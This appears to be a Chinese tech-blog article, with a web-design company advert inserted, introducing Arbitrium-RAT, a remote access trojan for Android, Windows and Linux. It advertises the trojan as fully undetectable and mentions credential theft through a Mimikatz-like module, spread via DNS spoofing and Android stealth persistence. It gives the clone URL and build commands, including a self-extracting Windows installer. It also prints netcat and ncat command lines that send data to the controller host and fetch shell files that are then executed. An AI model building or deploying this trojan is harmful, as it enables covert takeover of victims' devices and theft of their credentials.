這篇文章主要介紹怎么使用Arbitrium-RAT向Android、Windows和Linux植入遠(yuǎn)程訪問木馬，文中介紹的非常詳細(xì)，具有一定的參考價值，感興趣的小伙伴們一定要看完！

成都網(wǎng)站建設(shè)、成都網(wǎng)站制作的開發(fā)，更需要了解用戶，從用戶角度來建設(shè)網(wǎng)站，獲得較好的用戶體驗。成都創(chuàng)新互聯(lián)公司多年互聯(lián)網(wǎng)經(jīng)驗，見的多，溝通容易、能幫助客戶提出的運營建議。作為成都一家網(wǎng)絡(luò)公司，打造的就是網(wǎng)站建設(shè)產(chǎn)品直銷的概念。選擇成都創(chuàng)新互聯(lián)公司，不只是建站，我們把建站作為產(chǎn)品，不斷的更新、完善，讓每位來訪用戶感受到浩方產(chǎn)品的價值服務(wù)。

關(guān)于Arbitrium

Arbitrium是一款跨平臺并且完全無法被檢測到的遠(yuǎn)程訪問木馬，可以幫助廣大研究人員控制Android、Windows和Linux操作系統(tǒng)，而且完全不需要配置任何額外的防火墻規(guī)則或端口轉(zhuǎn)發(fā)規(guī)則。該工具可以提供本地網(wǎng)絡(luò)的訪問權(quán)，我們可以將目標(biāo)設(shè)備當(dāng)作一個HTTP代理來使用，并訪問目標(biāo)網(wǎng)絡(luò)中的路由器、發(fā)現(xiàn)本地IP或掃描目標(biāo)端口等等。

Arbitrium還自帶了類似Mimikatz的模塊，而且支持廣大研究人員添加自定義模塊。除此之外，如果將Arbitrium配合一款DNS欺騙軟件一起使用的話，就可以實現(xiàn)在目標(biāo)網(wǎng)絡(luò)設(shè)備之間實現(xiàn)木馬后門的自動傳播。Arbitrium是一個由多個部分組成的項目，并且使用了Java、JS、C、Python、Cordova和VueJS等多種編程語言進(jìn)行開發(fā)。

功能介紹

完全無法被檢測到（FUD）

客戶端使用了簡單的工具，這將允許Arbitrium完全無法被檢測到。木馬基于netcat通信，該組件主要負(fù)責(zé)通過管道處理TCP通信數(shù)據(jù)并運行服務(wù)器端發(fā)送過來的命令。

防火墻

Arbitrium不需要向防火墻添加任何的排除規(guī)則或端口轉(zhuǎn)發(fā)規(guī)則，服務(wù)器端是一個帶有API的終端節(jié)點，負(fù)責(zé)針對目標(biāo)主機和其他設(shè)備的任務(wù)接收，因為木馬每隔一段時間就會定期向服務(wù)器請求新的控制指令。這里的控制命令可以是一個JavaScript文件（Android應(yīng)用使用的是Cordova）或可以在命令行終端中運行的Shell文件。當(dāng)服務(wù)器端接收到目標(biāo)設(shè)備的任務(wù)之后，前者將設(shè)置一個計劃任務(wù)，然后開啟一個子進(jìn)程監(jiān)聽一個專用的臨時端口并等待木馬后門的響應(yīng)。因此，我們的木馬程序并不需要監(jiān)聽任何的端口。

電池優(yōu)化/隱蔽模式

跟普通Android操作系統(tǒng)不同的是，小米的MIUI、華為的EMUI或三星的Android Pie等定制產(chǎn)品忽略了用戶對應(yīng)用程序的權(quán)限/例外。因此，如果你嘗試在后臺運行Android端木馬后門，當(dāng)應(yīng)用程序開始運行頻繁或繁重（有時甚至是輕量級）任務(wù)（例如：定期發(fā)送HTTP請求）時，無論用戶授予什么權(quán)限，它都會被終止運行，而且操作系統(tǒng)完全忽略當(dāng)前的配置。

上面提到的這個問題非常煩人，但經(jīng)過一段時間的研究后我發(fā)現(xiàn)，我們可以通過構(gòu)建一個輕量級的二進(jìn)制文件，在后臺繼續(xù)運行分配的任務(wù)，而MainActivity在啟動二進(jìn)制文件之后就不會有什么動靜了，這樣可以幫助我們繞過絕大多數(shù)限制，而且還可以提高應(yīng)用程序的性能。

MainActivity從服務(wù)器接收一個JS文件，并使用ThreadPoolExecutor啟動二進(jìn)制文件，而無需掛起二進(jìn)制文件以使其退出（有關(guān)此StealthMode/BatteryBypass的詳細(xì)信息）。

Web接口

該工具還提供了一個控制面板，這個Web接口只是一個可選項，并非必須的。這是一個簡單的VueJS Web應(yīng)用程序，即一個可以幫助我們控制目標(biāo)的UI界面，而不用通過給API發(fā)送命令請求來實現(xiàn)控制?！军c我】訪問Arbitrium WebApp。

工具要求

Android客戶端

Java ver ...

Cordova

Android SDK & NDK

Windows/Linux客戶端

Python3.6 （或更新版本）

PyInquirer

Winrar （Windows only）

項目構(gòu)建

注意：需要使用setAPI_FQDN.sh設(shè)置所有文件中的服務(wù)器域名/IP地址。

使用下列命令將該項目源碼克隆至本地：

git clone https://github.com/BenChaliah/Arbitrium-RAT.git --recursive

Android

$ cd ArbitriumClients/AndroidApp/ClientApp/

$ cordova build android

$ cd ../StealthMode/

$ make clean && make build

Windows

$ cd ArbitriumClients\WindowsApp

$ pyinstaller --onefile runFrame.py

$ copy Client_tools\toolbox.exe dist\

$ copy Client_tools\SFXAutoInstaller.conf dist\

$ copy Client_tools\start_script.vbs dist\

$ cd dist

$ {Rar_abspath} a -r -cfg -sfx -z"SFXAutoInstaller.conf" Standalone.exe

組件

服務(wù)器API

$ pip install flask flask_cors && ./runserver.sh # Python2.7

├── runserver.sh

├── main.py

├── reverse_http.py

├── initProxy.py

│

├── assets (src: ArbitriumClients/AndroidApp/StealthMode)

│   ├── runFrame_arm64-v8a

│   ├── toolbox_arm64-v8a

│   ├── ... (x86, x86_64, armeabi-v7a)

│

│

├── JS_scripts

│   ├── checkupdate.js

│   ├── init.js

│   ├── runshell.js

│   └── StealthMode.js

│

├── misc

│

├── modules

│   ├── discover.py

│   ├── mimikatz.py

│   ├── ports.py

│   └── runCMD.py

│

└── threads

終端節(jié)點

[GET] /checkupdate.js

樣例：假設(shè)你想要將目標(biāo)以HTTP代理來使用，API會將請求構(gòu)建為下列命令：

echo -e "GET / HTTP/1.1\r\nHost: 192.168.1.1\r\nConnection: close\r\n\r\n" | {abspath_toolbox/ncat} {API_HOST_IP} {lport} -w 10;\r\n

然后將其存儲至assets/runsh_{uid_task}.sh中，/checkupdate.js會讓木馬下載并執(zhí)行shell文件：

>>> Popen("exec $(nc -l 0.0.0.0 -p {lport} -dN > {task_filename})" shell=True, close_fds=True, ...)

工具運行截圖

HTTP代理

PowerShell

端口掃描

以上是“怎么使用Arbitrium-RAT向Android、Windows和Linux植入遠(yuǎn)程訪問木馬”這篇文章的所有內(nèi)容，感謝各位的閱讀！希望分享的內(nèi)容對大家有幫助，更多相關(guān)知識，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道！